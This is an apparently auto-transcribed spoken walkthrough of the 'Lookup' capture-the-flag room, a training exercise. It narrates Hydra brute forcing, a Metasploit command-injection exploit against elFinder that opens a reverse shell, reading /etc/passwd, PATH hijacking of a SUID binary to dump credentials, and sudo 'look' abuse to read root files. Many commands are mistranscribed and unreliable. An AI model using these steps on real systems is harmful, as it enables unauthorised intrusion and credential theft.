Hello everyone, this is my walkthrough of Lookup. So this room is about testing your enumeration skills on this boot-to-root machine. So Lookup offers a treasure of trove of learning opportunities for aspiring hackers. This intriguing machine showcases real-world vulnerabilities ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, these hackers can sharpen their skills and gain invaluable experiences in ethical hacking. Though through Lookup, hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities such as command injections and understand the significance of secure coding practices. This machine also challenges hackers to automate tasks, demonstrating the power of scripting and penetration testing. Alright, so let's get started in this room. So we're now going to scan scan the machine. So we're going to type in nmap dash st dash sv dash sc. Maybe we should look for some ports and T5 for speed. Place selection and enter our IP address. So we got our nmap results. So we got port 22 open, which is an SSH service, and we also have port 80 open, which is a HTTP service, and it's running app cache. So we're gonna copy. We're gonna put the URL right here. So paste in the URL here and port 80. So, we need to put it in our etc-host. So I'm going to put sudo nano slash etc slash host etc slash host, and we're gonna paste in our code. Oops. We want the IP address. We want our IP address here, so we'll just paste this selection, and we want the lookup.thm right here. I'll just copy that, paste it in here, Control X, Y, Z, and then we'll run lookup.htm, and we see we have a login information with the username and password. Normally you would need a directory enumeration from this, but however there isn't any useful information from the directory enumeration. So next we're gonna enumerate this website further with this Python script. What this Python script does is basically it will just go through all the names for the username section, and it will find matching username from the website. So we're going to click on right click, save as, desktop, we'll call it user.py, click save. We'll go back to the host. So we're going to run this program. So we're going to ls. So we're going to type in python 3 user.py. So now we're going to run the Python script. So we're going to type in python python 3 user.py. We click enter. It's gonna look for all the usernames until it finds the right one. As we could see, we found a username called Joe's, so we need to remember that. Next, we're going to use a tool called Hydra. So we're going to right click new tab. We'll just paste it in. So it'll be Hydra-L Joe's password user share word list rocky.txt lookup.thm the http post form login.php equals user and password equals passwrong with a dash for both. We click enter. Next, we're going to use a tool called Hydra. So we're going to paste in the command. So we don't need to put the user share word list since I have it in the desktop. So it'll be Hydra-L just Joe's the password rocky.txt lookup.thm http post form the login.php the username equals user and password equals pass equals 1-v, and we should click enter. A minute. We'll click enter, and it's starting to crack the password until it finds the right one. This might take a second. Okay, the brute force is done, and we got the host lookup.thm. We got Joe's, and the password is password123. So we're going to try logging in. So Joe's, and we got the password right here. So it's password123. Password123, and we should be able to log in. So now we need to add another Etsy. We need to add something for Etsy host right here. So we'll just click here, copy, open a new tab, sudo nano /Etsy/hosts. So I think we need to add the following here. We just tab here, just paste it in here. Control X, Y, and enter, and it should work. There we go. So now we're in here, and we got a bunch of interesting information right here. So we're looking for something interesting here. So let's look at this top here. So let's click on about the software. It's Finder, and we got the version number right here, and the protocol version and the jQuery version. So what we can do is we could right click, copy, go back to our terminal. We'll just clear it. We'll this. We'll type in search exploit, and we'll just type in the Finder. Click enter, and we got so we can identify that the version number right here, version 2.1.47, matches right here. So this version of Finder is vulnerable to a command injector. So next we should just do is we're going to type in msf console, and we're going to run metasploit and do a command injection attack. We'll just wait for it to load. Okay, it has loaded, so now we're going to type in search. We're going to type in Finder. so we're looking for command injection. There's two command injections right here. So we want exploit number 4, so we'll just type in use for show options. We got our attack right here, and we're gonna set our hosts to the IP address of this machine. Let me just get that. So what we want to do is set our host, and then we're gonna set the target to files.lookup.thm, and we'll type in options again to see what else is missing. Then we want to set the lhost IP, so we'll type in set lhost to 10.11.95.20. That should be done. And then we just type in exploit. See if it's sending an exploit, and we open the interpreter session. Now we're going to type in get UID. We were in www data. Then we're going to type in cat /etc /passwd. We got all the the password links in the password files right here. Next we're going to try some prem commands. So we're going to type in 5/-prem/4002 greater than /dev-null. I think we need to type in shell first and then paste that in. So first let's fix our shell actually, so we'll just paste this in, fix our shell, and we wanna type in here and paste selection xterm right here. We'll try this command again. Does anything? We found something interesting right here, so we use spin pwn. We type in ls-la user.pwn, and it has root access, which is very interesting. So let's try something to do interesting with this. So we're going to type in usr/spin/pwn. So I typed in echo $path, and it gives this interesting path right here. So I typed this command in, so it'll be export path equals /temp/$path, and that. So what I've done here is basically we typed in echo path, which shows the directory right here, and then we added an export path equals /tmp$path, and we just echo the path again, and then it shows our temp folder in this directory. And now we're going to type cat /tmp/id. Oops. Well, I found this directory, so I could have just gone to cd home/think. So we got our first flag. I forgot about the user flag. Oh, permission denied. Let's see if we could try solving this. Okay, I'm figuring this out. So if you type PWM, yeah, there we go. So it can't run the ID. So let's try to solve this one. So next we're going to type echo. So echo and we'll just type a comma right here. UID equals 1000, then think, which is the user, to end it with the brackets and the comma, and then we put a regular comma right here, a bracket, a greater than or equal to, and then we'll just type in ID here. That should do, I think. And if you just type in cat ID, we got our ID right here. I think. Now we just do what we did before. So we're gonna type in export path. So yeah, so we want to export path equals $temp$path. So we just click enter right here, and then we just put echo $path, and that temp should be right here. And if you type ID, /ID, cat ID, we think. And if you type in PWM, and it's not working. I need to figure this out. Okay, I'm back. So I created another cat ID, so of echoing, and then now it's echoing think. So chmod, hope this works. Chmod plus x ID, and we'll see if it works. So we'll type in PWM. Oh, there we go. We got all the usernames and passwords. So and there's a lot of errors. So we want to copy all of this from what I remember. I'll just copy all of this. So I put a list in a text document. So these are a list of our passwords, and we're gonna brute force with Hydra. So I'll type the command here in a moment. Okay, now we're gonna try doing this. So click enter, and it'll try to crack the password. And there we go. We got the SSH host, the lookup.hm. We got the login, and we got the password right here. So now we're gonna log into the SSH server. So SSH think at lookup.thm. Yes, we want the password. We could put the password right here. Copy selection, paste it right here, and we got it. We logged in, ls, and cat user.txt, and we got our first flag right here. So we're gonna copy this flag, and we're gonna paste this user flag right here, click submit, and we got our first answer correct. For our second privilege escalation, we need to type in sudo -l, and we've got the password for think. Just gonna copy this password again, paste, and our user may be running the following commands on lookup, user bin look. We may have to look at GTFO bins. If you look at this privilege application, it looks like it's a file read, so it reads the data from the files. It may be used to do privileged reads or disclose files outside the restricted file system. So we're going to perform our privilege escalation by using this command right here. So next we're going to type in the command to read the root.txt file. So we did echo root /root.txt equals read.txt, so we type in ls, we got read.txt and user.txt. Then we type in l file. Oops, we did it again. L file equals read.txt, and we just click enter. And then I'll just paste the command from, oops, it's not working. Elf file equals read.txt. We just type this command right here, so sudo look double commas $l file root.txt, and then we're just gonna type in, we're gonna do the commas again, and then $l file right here. So sudo usr bin look single commas and then double commas $l file root.txt. And then we're going to type in cd slash, and then we're going to type in, we're going to try to read the file, the root file. So we're going to do l file equals root/root.txt, and then I think we need to do one more command. I think it's just this command again up top here, so we just paste that in, and here we go. We got our final flag right here, our root flag. We're just gonna copy this, and we're gonna paste our root flag here. And congratulations on completing the lookup room. This is my end of the first video of my walkthrough series. I hope it helps. It's the first time doing it, so I'm trying something new, but I'll see you in the next walkthrough. Bye bye.